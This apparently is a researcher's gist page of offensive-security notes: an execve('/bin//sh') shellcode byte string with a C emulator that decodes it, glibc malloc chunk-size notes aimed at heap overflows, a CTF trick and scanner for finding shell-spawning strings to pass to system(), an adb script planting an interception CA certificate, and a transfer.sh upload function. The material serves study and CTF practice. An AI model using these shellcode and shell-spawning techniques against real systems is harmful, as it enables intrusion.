nongiach
privesc
" Denite {{{
" Change file_rec command.
call denite#custom#var('file_rec', 'command',
\ ['ag', '--follow', '--nocolor', '--nogroup', '--ignore=*.pyc', '-g', ''])
" Change mappings.
call denite#custom#map(
\ 'insert',
\ 'K',
\ '<denite:move_to_next_line>',
nongiach / shellcoding
Last active June 20, 2018 23:11
https://i.imgur.com/L7CYCkp.png
https://github.com/plasma-disassembler/plasma
@pentest_swissky : https://twitter.com/pentest_swissky/status/1009545955069386758
tweetips$ echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" > /tmp/a
tweetips$ plasma --raw x86 /tmp/a
function _start (raw) {
0x0: eax = 0
0x2: push eax
0x3: push 1752379183 "//sh"
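The plasma listing above stops after the third instruction. As an added example (not from the gist and not plasma's code), here is a C program that decodes and emulates only the opcodes this 23-byte payload uses, prints a similar listing, and recovers what int 0x80 actually receives: the pathname assembled on the stack, argv, and the syscall number. The shellcode bytes are the ones from the echo command; the emulator is a toy by assumption and rejects any opcode outside that subset.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed input: the 23-byte execve("/bin//sh") shellcode echoed into /tmp/a above. */
static const uint8_t shellcode[] = {
    0x31, 0xc0,                    /* xor eax, eax                     */
    0x50,                          /* push eax     (string terminator) */
    0x68, 0x2f, 0x2f, 0x73, 0x68,  /* push "//sh"                      */
    0x68, 0x2f, 0x62, 0x69, 0x6e,  /* push "/bin"                      */
    0x89, 0xe3,                    /* mov ebx, esp (pathname)          */
    0x50,                          /* push eax     (envp = NULL)       */
    0x53,                          /* push ebx     (argv[0])           */
    0x89, 0xe1,                    /* mov ecx, esp (argv)              */
    0xb0, 0x0b,                    /* mov al, 11   (__NR_execve)       */
    0xcd, 0x80                     /* int 0x80                         */
};

#define STACK_SIZE 32

struct state {
    uint32_t eax;
    int ebx, ecx, esp;        /* pointers are modelled as indexes into stack[] */
    uint8_t stack[STACK_SIZE];
    int syscall_no;           /* eax when int 0x80 is reached, -1 if never reached */
    char path[STACK_SIZE];    /* NUL-terminated bytes at ebx when the syscall fires */
    char listing[512];        /* plasma-style disassembly, one line per instruction */
};

static void push32(struct state *s, uint32_t v) {
    s->esp -= 4;
    for (int i = 0; i < 4; i++)                        /* little-endian store */
        s->stack[s->esp + i] = (uint8_t)(v >> (8 * i));
}

static void emit(struct state *s, size_t off, const char *text) {
    size_t n = strlen(s->listing);
    snprintf(s->listing + n, sizeof(s->listing) - n, "0x%zx: %s\n", off, text);
}

/* Decode and emulate the shellcode. Only the opcodes this payload uses are
 * implemented (assumption: not a general x86 decoder); returns -1 on any other byte. */
static int run_shellcode(const uint8_t *code, size_t len, struct state *s) {
    char buf[64];
    memset(s, 0, sizeof *s);
    s->esp = STACK_SIZE;
    s->syscall_no = -1;
    for (size_t i = 0; i < len;) {
        uint8_t op = code[i], m = (i + 1 < len) ? code[i + 1] : 0;
        if (op == 0x31 && m == 0xc0) {                   /* xor eax, eax */
            s->eax = 0; emit(s, i, "xor eax, eax"); i += 2;
        } else if (op == 0x50) {                         /* push eax */
            push32(s, s->eax); emit(s, i, "push eax"); i += 1;
        } else if (op == 0x53) {                         /* push ebx */
            push32(s, (uint32_t)s->ebx); emit(s, i, "push ebx"); i += 1;
        } else if (op == 0x68 && i + 4 < len) {          /* push imm32 */
            uint32_t imm = 0;
            for (int k = 0; k < 4; k++)
                imm |= (uint32_t)code[i + 1 + k] << (8 * k);
            push32(s, imm);
            snprintf(buf, sizeof buf, "push 0x%08x \"%c%c%c%c\"", imm,
                     code[i + 1], code[i + 2], code[i + 3], code[i + 4]);
            emit(s, i, buf); i += 5;
        } else if (op == 0x89 && m == 0xe3) {            /* mov ebx, esp */
            s->ebx = s->esp; emit(s, i, "mov ebx, esp"); i += 2;
        } else if (op == 0x89 && m == 0xe1) {            /* mov ecx, esp */
            s->ecx = s->esp; emit(s, i, "mov ecx, esp"); i += 2;
        } else if (op == 0xb0 && i + 1 < len) {          /* mov al, imm8 */
            s->eax = (s->eax & 0xffffff00u) | m;
            snprintf(buf, sizeof buf, "mov al, %u", (unsigned)m);
            emit(s, i, buf); i += 2;
        } else if (op == 0xcd && m == 0x80) {            /* int 0x80 */
            s->syscall_no = (int)s->eax;
            size_t n = 0;                                /* copy the pathname ebx points at */
            while (s->ebx + (int)n < STACK_SIZE && s->stack[s->ebx + n] && n + 1 < sizeof s->path) {
                s->path[n] = (char)s->stack[s->ebx + n];
                n++;
            }
            s->path[n] = '\0';
            emit(s, i, "int 0x80"); i += 2;
        } else {
            return -1;
        }
    }
    return 0;
}

static struct state g;                 /* result of decoding the gist's shellcode */
static int decode_gist_shellcode(void) { return run_shellcode(shellcode, sizeof shellcode, &g); }

int main(void) {
    if (decode_gist_shellcode() != 0) { puts("unsupported opcode"); return 1; }
    fputs(g.listing, stdout);
    printf("syscall %d (execve), pathname \"%s\", argv = {pathname, NULL}, envp = NULL\n",
           g.syscall_no, g.path);
    return 0;
}
```

The emulation makes the two classic tricks visible: "/bin//sh" is padded to exactly 8 bytes so that two 4-byte pushes build it with no NUL byte in the code, and the terminator is the zeroed eax pushed first; the same zeroed eax then serves as envp, so the only immediate the payload needs is the syscall number in al.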
A web interface to manage Docker. Mounting /var/run/docker.sock into the container hands it full control of the Docker daemon, which is root on the host, and -p 9000:9000 exposes that unauthenticated UI on every network interface; bind it to localhost (-p 127.0.0.1:9000:9000) or put it behind an authenticating reverse proxy before leaving it running.
sudo docker run -d -p 9000:9000 -v /var/run/docker.sock:/docker.sock microbox/dockerui
http://microbox.io/
Write an exploit for this CVE: https://www.exploit-db.com/exploits/43718/
Write an IDA plugin to debug embedded code (see https://dougallj.wordpress.com/2018/06/04/writing-a-hex-rays-plugin-vmx-intrinsics/)
Describe use cases, as done here: https://github.com/illera88/Ponce
pwntools integration
IDA plugin
Add original function arguments to exall
and document exall callbacks
transfer ()
{
    if [ $# -eq 0 ]; then
        # printf rather than echo: plain echo does not expand \n on every shell
        printf 'No arguments specified. Usage:\n  transfer /tmp/test.md\n  cat /tmp/test.md | transfer test.md\n';
        return 1;
    fi;
    tmpfile=$( mktemp -t transferXXX );
    if tty -s; then
        # stdin is a terminal: upload the named file under a sanitised basename
        basefile=$(basename "$1" | sed -e 's/[^a-zA-Z0-9._-]/-/g');
        curl --progress-bar --upload-file "$1" "https://transfer.sh/$basefile" >> "$tmpfile";
    else
        # stdin is a pipe: upload it under the name given (the second usage form above)
        curl --progress-bar --upload-file "-" "https://transfer.sh/$1" >> "$tmpfile";
    fi;
    cat "$tmpfile";   # the service answers with the download URL
    rm -f "$tmpfile";
}
# Fetch the intercepting proxy's CA certificate (served at /cert on its listener) and convert DER -> PEM
wget http://SERVER:8282/cert -O cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
rm cacert.der
# Android's system store names each CA <subject_hash_old>.0 (the pre-1.0 OpenSSL hash), not -subject_hash
CERT="$(openssl x509 -inform PEM -subject_hash_old -noout -in cacert.pem).0"
adb connect SERVER:5555
adb root
# adb root restarts adbd, so the TCP connection has to be re-established
adb connect SERVER:5555
adb remount
adb push cacert.pem "/system/etc/security/cacerts/${CERT}"
adb shell chmod 644 "/system/etc/security/cacerts/${CERT}"
# Check that the file landed with the expected name and mode
adb shell ls -l "/system/etc/security/cacerts/${CERT}"
glibc malloc on x86-64: the size field stored in the chunk header is the chunk size with the PREV_INUSE bit set (hence the odd values), and the usable size is the chunk size minus the 8-byte size field. Filtering the program's output to the requests that land exactly on a 0x100 boundary:
./a.out | grep '00 '
malloc(240), in metadata => 257, real_chunk_size => 0x100 | usable_size => 0xf8
malloc(496), in metadata => 513, real_chunk_size => 0x200 | usable_size => 0x1f8
malloc(752), in metadata => 769, real_chunk_size => 0x300 | usable_size => 0x2f8
malloc(1008), in metadata => 1025, real_chunk_size => 0x400 | usable_size => 0x3f8
malloc(1264), in metadata => 1281, real_chunk_size => 0x500 | usable_size => 0x4f8
malloc(1520), in metadata => 1537, real_chunk_size => 0x600 | usable_size => 0x5f8
malloc(1776), in metadata => 1793, real_chunk_size => 0x700 | usable_size => 0x6f8
malloc(2032), in metadata => 2049, real_chunk_size => 0x800 | usable_size => 0x7f8
malloc(2288), in metadata => 2305, real_chunk_size => 0x900 | usable_size => 0x8f8
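As an added example (not the a.out from the gist, whose source is not shown), a C program that reproduces the table: it mirrors glibc's request2size() rounding for x86-64 (assumption: 64-bit glibc constants) and, for each request, compares the modelled header value with the size field glibc actually stored 8 bytes before the returned pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* glibc malloc layout constants for x86-64 (assumption: a 64-bit glibc; on
 * 32-bit SIZE_SZ is 4 and MINSIZE 16, so every number below changes). */
#define SIZE_SZ           (sizeof(size_t))
#define MALLOC_ALIGNMENT  (2 * SIZE_SZ)
#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
#define MINSIZE           (4 * SIZE_SZ)          /* 0x20: smallest chunk */
#define PREV_INUSE        ((size_t)0x1)
#define SIZE_BITS         ((size_t)0x7)          /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* Mirror of glibc's request2size(): add room for the size field, round up to
 * the alignment, never go below MINSIZE. */
static size_t chunk_size_for(size_t request) {
    size_t n = request + SIZE_SZ + MALLOC_ALIGN_MASK;
    if (n < MINSIZE)
        return MINSIZE;
    return n & ~MALLOC_ALIGN_MASK;
}

/* What the caller may write without touching the next chunk's size field:
 * the chunk minus its own 8-byte size field (the next chunk's prev_size slot
 * is usable while this chunk is in use, which is why 0xf8 and not 0xf0). */
static size_t usable_size_for(size_t request) {
    return chunk_size_for(request) - SIZE_SZ;
}

/* The value the table calls "in metadata": size field with PREV_INUSE set,
 * as it looks for a freshly malloc'd chunk whose predecessor is in use. */
static size_t header_value_for(size_t request) {
    return chunk_size_for(request) | PREV_INUSE;
}

/* Read the size field glibc stores immediately before the returned pointer. */
static size_t live_header(void *p) {
    return ((size_t *)p)[-1];
}

int main(void) {
    for (size_t req = 240; req <= 2288; req += 256) {
        void *p = malloc(req);
        if (!p)
            return 1;
        size_t hdr = live_header(p);
        printf("malloc(%zu), in metadata => %zu, real_chunk_size => 0x%zx | usable_size => 0x%zx%s\n",
               req, hdr, hdr & ~SIZE_BITS, usable_size_for(req),
               hdr == header_value_for(req) ? "" : "  (differs from the model!)");
        /* deliberately not freed, so each next chunk follows an in-use one */
    }
    return 0;
}
```

The model ignores mmapped chunks (requests at or above the mmap threshold), whose size field carries IS_MMAPPED and no PREV_INUSE; for anything served from the heap it is exact, and the usable_size_for() value is the number to keep in mind when choosing an allocation whose overflow lands on the next chunk's size field.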
#!/usr/bin/python3
# https://github.com/epsy/clize
# pip install clize
import clize

def exploit(target, motivation=42):
    """'target' is a required positional argument; 'motivation' has a default and so is optional."""
    print(target, motivation)

def fuzz(target, tool="afl", *, share=False):
    """'share' is keyword-only and therefore becomes the --share flag; 'tool' stays optional."""
    print(target, tool, share)   # body added so the stub runs; the gist preview ends at the signature

if __name__ == "__main__":
    # passing several functions turns each into a subcommand: ./x.py fuzz ./target --share
    clize.run(exploit, fuzz)
@moyix
Another CTF trick: if you need a string for system() that will get you a shell, consider the humble "ed". It supports running shell commands (!), and b/c of English past tense is often available as a suffix of some existing string in the binary, e.g.: "File transfer complet𝙚𝙙"
@chaign_c
It also works with "ex", "vi", "sh", "vim", "gdb", "ftp", "php", "irb". I don't have ed on archlinux. ls /bin/???? if you want more.
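As an added example (not from the tweets or the gist), a small C scanner that does the lookup the trick relies on: walk a blob of NUL-terminated strings and report the offset of any tail that is one of the commands named above, which is the pointer to hand to system(). The sample .rodata here is constructed; in practice you run it over the binary's string section and add the load base to the offset.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Commands from the thread that spawn a shell (or let you run one with "!")
 * when passed to system(); any string whose tail is one of them will do. */
static const char *const SHELL_SUFFIXES[] = {
    "ed", "ex", "vi", "sh", "vim", "gdb", "ftp", "php", "irb", NULL
};

/* Constructed sample: a few NUL-terminated strings as they would sit in
 * .rodata (assumption: this stands in for a real binary's string section). */
static const uint8_t rodata[] =
    "Usage: %s <file>\0"
    "File transfer completed\0"
    "bytes read: %d\0"
    "error: cannot open\0"
    "flush\0";

struct hit {
    size_t offset;      /* offset of the suffix, i.e. the argument for system() */
    const char *cmd;    /* which command that suffix is */
};

/* Scan a blob for NUL-terminated strings whose tail is a shell suffix.
 * Returns the number of hits written to out (at most max). */
static size_t find_shell_suffixes(const uint8_t *blob, size_t len,
                                  struct hit *out, size_t max) {
    size_t n = 0, start = 0;
    for (size_t i = 0; i < len && n < max; i++) {
        if (blob[i] != 0)
            continue;
        size_t slen = i - start;                     /* blob[start..i) is one string */
        for (const char *const *s = SHELL_SUFFIXES; *s; s++) {
            size_t k = strlen(*s);
            if (slen >= k && memcmp(blob + i - k, *s, k) == 0) {
                out[n].offset = i - k;
                out[n].cmd = *s;
                n++;
                break;                               /* one hit per string */
            }
        }
        start = i + 1;
    }
    return n;
}

int main(void) {
    struct hit hits[16];
    size_t n = find_shell_suffixes(rodata, sizeof rodata, hits, 16);
    for (size_t i = 0; i < n; i++)
        printf("offset 0x%zx -> \"%s\" (system(base + 0x%zx) runs %s)\n",
               hits[i].offset, (const char *)rodata + hits[i].offset,
               hits[i].offset, hits[i].cmd);
    return 0;
}
```

Because system() runs the string through sh -c, the suffix pointer must land exactly on the command with nothing before it, which is why the scanner reports the tail offset rather than the start of the string; a word like "flush" yields "sh" just as "completed" yields "ed". Remember that ed and the editors need a usable stdin to receive the "!sh" that actually gives the shell.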
grep is the more portable choice here: match() with a third array argument is a gawk extension, so the awk version fails on mawk or BusyBox awk, while grep -o works on GNU, BSD and BusyBox grep.
ip a | grep -o ':.*: ' | grep -v ': lo: ' | grep -o '[^ :]*'
ip a | awk '!/: lo: / && match($0, ": (.*): ", a) {print a[1]}'